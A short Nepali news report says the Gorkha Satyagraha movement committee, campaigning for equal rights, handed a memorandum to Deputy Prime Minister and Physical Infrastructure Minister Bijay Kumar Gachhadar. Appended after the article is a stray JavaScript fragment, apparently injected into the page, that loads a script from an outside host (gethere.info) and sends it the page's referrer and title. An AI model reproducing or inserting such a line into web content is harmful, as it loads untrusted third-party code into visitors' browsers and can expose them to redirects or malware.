समानताको हक अधिकारका लागि लड्दै आएका गोर्खा सत्याग्रह आन्दोलन संघर्ष समितिले शुक्रबार उपप्रधान एवं भौतिक पूर्वाधार तथा योजनामन्त्री विजयकुमार गच्छदारलाई ज्ञापन पत्र बुझाएको छ । भौतिक पूर्वाधार तथा योजना मन्त्रालयमा गोर्खालीहरुरुले ज्ञापन पत्र बुझाएका हुन । आफ्ना माग पुरा गराउन यसअघि प्रधानमन्त्रीलगायतलाई माग पुरा गराउन पहल गरिदिन ज्ञापन बुझाइसकेका छन ।

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;